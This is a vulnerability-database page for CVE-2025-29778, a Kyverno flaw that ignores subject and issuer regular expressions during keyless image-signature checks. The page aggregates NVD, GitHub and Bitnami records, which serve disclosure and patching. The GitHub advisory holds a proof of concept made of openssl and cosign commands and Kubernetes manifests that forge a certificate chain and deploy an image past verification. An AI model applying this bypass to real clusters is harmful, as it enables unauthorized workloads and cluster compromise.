Vulnerability-Lookup

CVE-2025-29778 (GCVE-0-2025-29778)

Vulnerability from cvelistv5 – Published: 2025-03-24 16:38 – Updated: 2025-03-24 17:55

Title

Kyverno ignores subjectRegExp and IssuerRegExp

Summary

Kyverno is a policy engine designed for cloud native platform engineering teams. Prior to version 1.14.0-alpha.1, Kyverno ignores subjectRegExp and IssuerRegExp while verifying artifact's sign with keyless mode. It allows the attacker to deploy kubernetes resources with the artifacts that were signed by unexpected certificate. Deploying these unauthorized kubernetes resources can lead to full compromise of kubernetes cluster. Version 1.14.0-alpha.1 contains a patch for the issue.

Severity ?

5.8 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N

CWE

CWE-285 - Improper Authorization

Assigner

GitHub_M

References

URL

Tags

	https://github.com/kyverno/kyverno/security/advis…	x_refsource_CONFIRM
	https://github.com/kyverno/policies/issues/1246	x_refsource_MISC
	https://github.com/kyverno/kyverno/pull/12237	x_refsource_MISC
	https://github.com/kyverno/kyverno/commit/8777672…	x_refsource_MISC
	https://github.com/Mohdcode/kyverno/blob/373f942e…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	kyverno	kyverno	Affected: < 1.14.0-alpha.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-29778",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-03-24T17:55:17.656781Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-24T17:55:28.379Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kyverno",
          "vendor": "kyverno",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.14.0-alpha.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Kyverno is a policy engine designed for cloud native platform engineering teams. Prior to version 1.14.0-alpha.1, Kyverno ignores subjectRegExp and IssuerRegExp while verifying artifact\u0027s sign with keyless mode. It allows the attacker to deploy kubernetes resources with the artifacts that were signed by unexpected certificate. Deploying these unauthorized kubernetes resources can lead to full compromise of kubernetes cluster. Version 1.14.0-alpha.1 contains a patch for the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-285",
              "description": "CWE-285: Improper Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-03-24T16:38:08.104Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/kyverno/kyverno/security/advisories/GHSA-46mp-8w32-6g94",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-46mp-8w32-6g94"
        },
        {
          "name": "https://github.com/kyverno/policies/issues/1246",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/kyverno/policies/issues/1246"
        },
        {
          "name": "https://github.com/kyverno/kyverno/pull/12237",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/kyverno/kyverno/pull/12237"
        },
        {
          "name": "https://github.com/kyverno/kyverno/commit/8777672fb17bdf252bd2e7d8de3441e240404a60",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/kyverno/kyverno/commit/8777672fb17bdf252bd2e7d8de3441e240404a60"
        },
        {
          "name": "https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537"
        }
      ],
      "source": {
        "advisory": "GHSA-46mp-8w32-6g94",
        "discovery": "UNKNOWN"
      },
      "title": "Kyverno ignores subjectRegExp and IssuerRegExp"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-29778",
    "datePublished": "2025-03-24T16:38:08.104Z",
    "dateReserved": "2025-03-11T14:23:00.475Z",
    "dateUpdated": "2025-03-24T17:55:28.379Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-29778\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-03-24T17:55:17.656781Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-03-24T17:55:24.257Z\"}}], \"cna\": {\"title\": \"Kyverno ignores subjectRegExp and IssuerRegExp\", \"source\": {\"advisory\": \"GHSA-46mp-8w32-6g94\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 5.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"kyverno\", \"product\": \"kyverno\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.14.0-alpha.1\"}]}], \"references\": [{\"url\": \"https://github.com/kyverno/kyverno/security/advisories/GHSA-46mp-8w32-6g94\", \"name\": \"https://github.com/kyverno/kyverno/security/advisories/GHSA-46mp-8w32-6g94\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kyverno/policies/issues/1246\", \"name\": \"https://github.com/kyverno/policies/issues/1246\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kyverno/kyverno/pull/12237\", \"name\": \"https://github.com/kyverno/kyverno/pull/12237\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/kyverno/kyverno/commit/8777672fb17bdf252bd2e7d8de3441e240404a60\", \"name\": \"https://github.com/kyverno/kyverno/commit/8777672fb17bdf252bd2e7d8de3441e240404a60\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537\", \"name\": \"https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Kyverno is a policy engine designed for cloud native platform engineering teams. Prior to version 1.14.0-alpha.1, Kyverno ignores subjectRegExp and IssuerRegExp while verifying artifact\u0027s sign with keyless mode. It allows the attacker to deploy kubernetes resources with the artifacts that were signed by unexpected certificate. Deploying these unauthorized kubernetes resources can lead to full compromise of kubernetes cluster. Version 1.14.0-alpha.1 contains a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-285\", \"description\": \"CWE-285: Improper Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-03-24T16:38:08.104Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-29778\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-03-24T17:55:28.379Z\", \"dateReserved\": \"2025-03-11T14:23:00.475Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-03-24T16:38:08.104Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2025-29778

Vulnerability from fkie_nvd - Published: 2025-03-24 17:15 - Updated: 2025-08-01 13:10

Severity ?

5.8 (Medium) - CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N
8.0 (High) - CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537	Product
security-advisories@github.com	https://github.com/kyverno/kyverno/commit/8777672fb17bdf252bd2e7d8de3441e240404a60	Patch
security-advisories@github.com	https://github.com/kyverno/kyverno/pull/12237	Issue Tracking
security-advisories@github.com	https://github.com/kyverno/kyverno/security/advisories/GHSA-46mp-8w32-6g94	Exploit, Vendor Advisory
security-advisories@github.com	https://github.com/kyverno/policies/issues/1246	Exploit, Issue Tracking

Impacted products

	Vendor	Product	Version
	kyverno	kyverno	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1BDA4D3F-2144-4904-8BD8-26A15B0401B2",
              "versionEndExcluding": "1.13.6",
              "versionStartIncluding": "1.13.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Kyverno is a policy engine designed for cloud native platform engineering teams. Prior to version 1.14.0-alpha.1, Kyverno ignores subjectRegExp and IssuerRegExp while verifying artifact\u0027s sign with keyless mode. It allows the attacker to deploy kubernetes resources with the artifacts that were signed by unexpected certificate. Deploying these unauthorized kubernetes resources can lead to full compromise of kubernetes cluster. Version 1.14.0-alpha.1 contains a patch for the issue."
    },
    {
      "lang": "es",
      "value": "Kyverno es un motor de pol\u00edticas dise\u00f1ado para equipos de ingenier\u00eda de plataformas nativas de la nube. Antes de la versi\u00f3n 1.14.0-alpha.1, Kyverno ignoraba subjectRegExp y IssuerRegExp al verificar la firma de artefactos con el modo sin clave. Esto permite al atacante implementar recursos de Kubernetes con artefactos firmados por un certificado inesperado. Implementar estos recursos de Kubernetes no autorizados puede comprometer por completo el cl\u00faster de Kubernetes. La versi\u00f3n 1.14.0-alpha.1 incluye un parche para este problema."
    }
  ],
  "id": "CVE-2025-29778",
  "lastModified": "2025-08-01T13:10:56.737",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.3,
        "impactScore": 4.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.0,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.3,
        "impactScore": 6.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2025-03-24T17:15:20.970",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/kyverno/kyverno/commit/8777672fb17bdf252bd2e7d8de3441e240404a60"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/kyverno/kyverno/pull/12237"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-46mp-8w32-6g94"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Issue Tracking"
      ],
      "url": "https://github.com/kyverno/policies/issues/1246"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-285"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-46MP-8W32-6G94

Vulnerability from github – Published: 2025-03-24 19:07 – Updated: 2025-05-08 14:51

Summary

Kyverno ignores subjectRegExp and IssuerRegExp

Details

Summary

Kyverno ignores subjectRegExp and IssuerRegExp while verifying artifact's sign with keyless mode. It allows the attacker to deploy kubernetes resources with the artifacts that were signed by unexpected certificate.

Details

Kyverno checks only subject and issuer fields when verifying an artifact's signature: https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537. While there are subjectRegExp and issuerRegExp fields that can also be used for the defining expected subject and issue values. If the last ones are used then their values are not taken in count and there is no actually restriction for the certificate that was used for the image sign.

PoC

For the successful exploitation attacker needs: - Private key of any certificate in the certificate chain that trusted by cosign. It can be certificate that signed by company's self-signed Root CA if they are using their own PKI. - Access to container registry to push artifacts images - Availability to deploy malicious artifacts to the kubernetes cluster

Generate certificate that will be used for the image signing with the oidcissuer url. That can be done with the Fulcio or manually by using openssl

# Create self-signed RootCA
openssl req -x509 -newkey rsa:4096 -keyout root-ca-key.pem -sha256 -noenc -days 9999 -subj "/C=AA/L=Location/O=IT/OU=Security/CN=Root Certificate Authority" -out root-ca.pem


# Create request for the intermediate certificate
openssl req -noenc -newkey rsa:4096 -keyout intermediate-ca-key.pem -addext "subjectKeyIdentifier = hash" -addext "keyUsage = critical,keyCertSign" -addext "basicConstraints = critical,CA:TRUE,pathlen:2" -subj "/C=AA/L=Location/O=IT/OU=Security/CN=Intermediate Certificate Authority" -out intermediate-ca.csr

# Issue intermediate cert with RootCA
openssl x509 -req -days 9999 -sha256 -in intermediate-ca.csr -CA root-ca.pem -CAkey root-ca-key.pem -copy_extensions copy -out intermediate-ca.pem

# OID_1_1 is the hexadecimal representation of the oidcissuer url
OID_1_1=$(echo -n "https://me.net" | xxd -p -u)

# Create request for the leaf certificate
openssl req -noenc -newkey rsa:4096 -keyout my-key.pem -addext "subjectKeyIdentifier = hash" -addext "basicConstraints = critical,CA:FALSE" -addext "keyUsage = critical,digitalSignature" -addext "subjectAltName = email:me@me.net" -addext "1.3.6.1.4.1.57264.1.1 = DER:${OID_1_1}" -addext "1.3.6.1.4.1.57264.1.8 = ASN1:UTF8String:https://me.net" -subj "/C=AA/L=Location/O=IT/OU=Security/CN=My Cosign Certificate" -out my-cert.csr

# Issue leaf cert with Intermediate CA
openssl x509 -req -in my-cert.csr -CA intermediate-ca.pem -CAkey intermediate-ca-key.pem -copy_extensions copy -days 9999 -sha256 -out my-cert.pem

# Generate certificates chain
cat intermediate-ca.pem root-ca.pem > cert-chain.pem

Build and push container image
Import key and sign the image with the generated certificate

COSIGN_PASSWORD="" cosign import-key-pair --key my-key.pem --output-key-prefix=import-my-key
COSIGN_PASSWORD="" cosign sign $IMAGE_WITH_HASH --tlog-upload=false --cert my-cert.pem --cert-chain cert-chain.pem --key import-my-key.key

Add ClusterPolicy for the Kyverno with the wrong subject and issuer regexp. Adding (Fulcio) Root CA as secret and using it in policy is optional only if cosign cannot trust it:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: check-image-keyless
spec:
  validationFailureAction: Enforce
  webhookTimeoutSeconds: 30
  rules:
    - name: check-image-keyless
      match:
        any:
        - resources:
            kinds:
              - Pod
      context:
        - name: encodedCert
          apiCall:
            urlPath: "/api/v1/namespaces/kyverno/secrets/fulcio-ca"
            method: GET
            jmesPath: "data.\"fulcio-ca.pem\""
        - name: root
          variable:
            jmesPath: "base64_decode(encodedCert)"
      verifyImages:
      - imageReferences:
        - "<IMAGE_REGEXP>"
        attestors:
        - entries:
          - keyless:
              subjectRegExp: https://ivalid
              issuerRegExp: https://ivalid
              roots: "{{root}}"
              rekor:
                url: <URL_TO_REKOR>
                pubkey: |-
                  -----BEGIN PUBLIC KEY-----
                  ...
                  -----END PUBLIC KEY-----
              ctlog:
                pubkey: |-
                  -----BEGIN PUBLIC KEY-----
                  ...
                  -----END PUBLIC KEY-----

Deploy previously signed image

apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: image-sign
  name: image-sign
  namespace: default
spec:
  replicas: 2
  selector:
    matchLabels:
      app: image-sign
  strategy: {}
  template:
    metadata:
      annotations:
      labels:
        app: image-sign
    spec:
      containers:
        - image: <YOUR_IMAGE>
          imagePullPolicy: Always
          name: image-signing
          ports:
            - containerPort: 5000
          resources:
            requests:
              memory: 500Mi
              cpu: 0.1
            limits:
              memory: 2Gi
              cpu: 0.2
      restartPolicy: Always
status: {}

The deployment with pods will be create successfully due to not checking subjectRegExp and issuerRegExp fields validation

Impact

Deploying unauthorized kubernetes resources that can lead to full compromise of kubernetes cluster

P.S.

Problem was discovered by me when testing image sign verifying with keyless signing: https://kubernetes.slack.com/archives/CLGR9BJU9/p1740136401365279?thread_ts=1740136401.365279&cid=CLGR9BJU9. Then it was verified and fixed by Mohcode. But i think it should be registered as security problem such as it allows to bypass part of the verification mechanism and Kyverno users should be aware of it.

Severity ?

5.8 (Medium)


                  
                    CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 1.13.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/kyverno/kyverno"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.13.0"
            },
            {
              "fixed": "1.14.0-alpha.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-29778"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-24T19:07:28Z",
    "nvd_published_at": "2025-03-24T17:15:20Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nKyverno ignores subjectRegExp and IssuerRegExp while verifying artifact\u0027s sign with keyless mode. It allows the attacker to deploy kubernetes resources with the artifacts that were signed by unexpected certificate.\n\n### Details\nKyverno checks only subject and issuer fields when verifying an artifact\u0027s signature: https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537. While there are subjectRegExp and issuerRegExp fields that can also be used for the defining expected subject and issue values. If the last ones are used then their values are not taken in count and there is no actually restriction for the certificate that was used for the image sign.\n\n\n### PoC\n\nFor the successful exploitation attacker needs:\n- Private key of any certificate in the certificate chain that trusted by cosign. It can be certificate that signed by company\u0027s self-signed Root CA if they are using their own PKI.\n- Access to container registry to push artifacts images \n- Availability to deploy malicious artifacts to the kubernetes cluster\n\n1. Generate certificate that will be used for the image signing with the oidcissuer url. That can be done with the Fulcio or manually by using openssl\n\n```\n# Create self-signed RootCA\nopenssl req -x509 -newkey rsa:4096 -keyout root-ca-key.pem -sha256 -noenc -days 9999 -subj \"/C=AA/L=Location/O=IT/OU=Security/CN=Root Certificate Authority\" -out root-ca.pem\n\n\n# Create request for the intermediate certificate\nopenssl req -noenc -newkey rsa:4096 -keyout intermediate-ca-key.pem -addext \"subjectKeyIdentifier = hash\" -addext \"keyUsage = critical,keyCertSign\" -addext \"basicConstraints = critical,CA:TRUE,pathlen:2\" -subj \"/C=AA/L=Location/O=IT/OU=Security/CN=Intermediate Certificate Authority\" -out intermediate-ca.csr\n\n# Issue intermediate cert with RootCA\nopenssl x509 -req -days 9999 -sha256 -in intermediate-ca.csr -CA root-ca.pem -CAkey root-ca-key.pem -copy_extensions copy -out intermediate-ca.pem\n\n# OID_1_1 is the hexadecimal representation of the oidcissuer url\nOID_1_1=$(echo -n \"https://me.net\" | xxd -p -u)\n\n# Create request for the leaf certificate\nopenssl req -noenc -newkey rsa:4096 -keyout my-key.pem -addext \"subjectKeyIdentifier = hash\" -addext \"basicConstraints = critical,CA:FALSE\" -addext \"keyUsage = critical,digitalSignature\" -addext \"subjectAltName = email:me@me.net\" -addext \"1.3.6.1.4.1.57264.1.1 = DER:${OID_1_1}\" -addext \"1.3.6.1.4.1.57264.1.8 = ASN1:UTF8String:https://me.net\" -subj \"/C=AA/L=Location/O=IT/OU=Security/CN=My Cosign Certificate\" -out my-cert.csr\n\n# Issue leaf cert with Intermediate CA\nopenssl x509 -req -in my-cert.csr -CA intermediate-ca.pem -CAkey intermediate-ca-key.pem -copy_extensions copy -days 9999 -sha256 -out my-cert.pem\n\n# Generate certificates chain\ncat intermediate-ca.pem root-ca.pem \u003e cert-chain.pem\n```\n\n2. Build and push container image\n2. Import key and sign the image with the generated certificate\n```\nCOSIGN_PASSWORD=\"\" cosign import-key-pair --key my-key.pem --output-key-prefix=import-my-key\nCOSIGN_PASSWORD=\"\" cosign sign $IMAGE_WITH_HASH --tlog-upload=false --cert my-cert.pem --cert-chain cert-chain.pem --key import-my-key.key\n```\n\n3. Add ClusterPolicy for the Kyverno with the wrong subject and issuer regexp. Adding (Fulcio) Root CA as secret and using it in policy is optional only if cosign cannot trust it:\n```\napiVersion: kyverno.io/v1\nkind: ClusterPolicy\nmetadata:\n  name: check-image-keyless\nspec:\n  validationFailureAction: Enforce\n  webhookTimeoutSeconds: 30\n  rules:\n    - name: check-image-keyless\n      match:\n        any:\n        - resources:\n            kinds:\n              - Pod\n      context:\n        - name: encodedCert\n          apiCall:\n            urlPath: \"/api/v1/namespaces/kyverno/secrets/fulcio-ca\"\n            method: GET\n            jmesPath: \"data.\\\"fulcio-ca.pem\\\"\"\n        - name: root\n          variable:\n            jmesPath: \"base64_decode(encodedCert)\"\n      verifyImages:\n      - imageReferences:\n        - \"\u003cIMAGE_REGEXP\u003e\"\n        attestors:\n        - entries:\n          - keyless:\n              subjectRegExp: https://ivalid\n              issuerRegExp: https://ivalid\n              roots: \"{{root}}\"\n              rekor:\n                url: \u003cURL_TO_REKOR\u003e\n                pubkey: |-\n                  -----BEGIN PUBLIC KEY-----\n                  ...\n                  -----END PUBLIC KEY-----\n              ctlog:\n                pubkey: |-\n                  -----BEGIN PUBLIC KEY-----\n                  ...\n                  -----END PUBLIC KEY-----\n```\n\n4. Deploy previously signed image\n```\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n  labels:\n    app: image-sign\n  name: image-sign\n  namespace: default\nspec:\n  replicas: 2\n  selector:\n    matchLabels:\n      app: image-sign\n  strategy: {}\n  template:\n    metadata:\n      annotations:\n      labels:\n        app: image-sign\n    spec:\n      containers:\n        - image: \u003cYOUR_IMAGE\u003e\n          imagePullPolicy: Always\n          name: image-signing\n          ports:\n            - containerPort: 5000\n          resources:\n            requests:\n              memory: 500Mi\n              cpu: 0.1\n            limits:\n              memory: 2Gi\n              cpu: 0.2\n      restartPolicy: Always\nstatus: {}\n```\n\n5. The deployment with pods will be create successfully due to not checking subjectRegExp and issuerRegExp fields validation\n\n### Impact\nDeploying unauthorized kubernetes resources that can lead to full compromise of kubernetes cluster\n\n### P.S.\nProblem was discovered by me when testing image sign verifying with keyless signing: \nhttps://kubernetes.slack.com/archives/CLGR9BJU9/p1740136401365279?thread_ts=1740136401.365279\u0026cid=CLGR9BJU9. Then it was [verified](https://github.com/kyverno/policies/issues/1246) and [fixed](https://github.com/kyverno/kyverno/pull/12237) by [Mohcode](https://github.com/Mohdcode). But i think it should be registered as security problem such as it allows to bypass part of the verification mechanism and Kyverno users should be aware of it.",
  "id": "GHSA-46mp-8w32-6g94",
  "modified": "2025-05-08T14:51:55Z",
  "published": "2025-03-24T19:07:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-46mp-8w32-6g94"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29778"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/policies/issues/1246"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/pull/12237"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/commit/8777672fb17bdf252bd2e7d8de3441e240404a60"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kyverno/kyverno"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Kyverno ignores subjectRegExp and IssuerRegExp"
}

bit-kyverno-2025-29778

Vulnerability from bitnami_vulndb

Published

2025-09-12 11:43

Modified

2026-01-08 18:07

Summary

Kyverno ignores subjectRegExp and IssuerRegExp

Details

Kyverno is a policy engine designed for cloud native platform engineering teams. Prior to version 1.14.0, Kyverno ignores subjectRegExp and IssuerRegExp while verifying artifact's sign with keyless mode. It allows the attacker to deploy kubernetes resources with the artifacts that were signed by unexpected certificate. Deploying these unauthorized kubernetes resources can lead to full compromise of kubernetes cluster. Version 1.14.0 contains a patch for the issue.

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Bitnami",
        "name": "kyverno",
        "purl": "pkg:bitnami/kyverno"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.14.0"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "severity": [
        {
          "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
          "type": "CVSS_V3"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-29778"
  ],
  "database_specific": {
    "cpes": [
      "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:go:*:*"
    ],
    "severity": "High"
  },
  "details": "Kyverno is a policy engine designed for cloud native platform engineering teams. Prior to version 1.14.0, Kyverno ignores subjectRegExp and IssuerRegExp while verifying artifact\u0027s sign with keyless mode. It allows the attacker to deploy kubernetes resources with the artifacts that were signed by unexpected certificate. Deploying these unauthorized kubernetes resources can lead to full compromise of kubernetes cluster. Version 1.14.0 contains a patch for the issue.",
  "id": "BIT-kyverno-2025-29778",
  "modified": "2026-01-08T18:07:34.629Z",
  "published": "2025-09-12T11:43:02.825Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Mohdcode/kyverno/blob/373f942ea9fa8b63140d0eb0e101b9a5f71033f3/pkg/cosign/cosign.go#L537"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/commit/8777672fb17bdf252bd2e7d8de3441e240404a60"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/pull/12237"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-46mp-8w32-6g94"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/policies/issues/1246"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29778"
    }
  ],
  "schema_version": "1.6.2",
  "summary": "Kyverno ignores subjectRegExp and IssuerRegExp"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

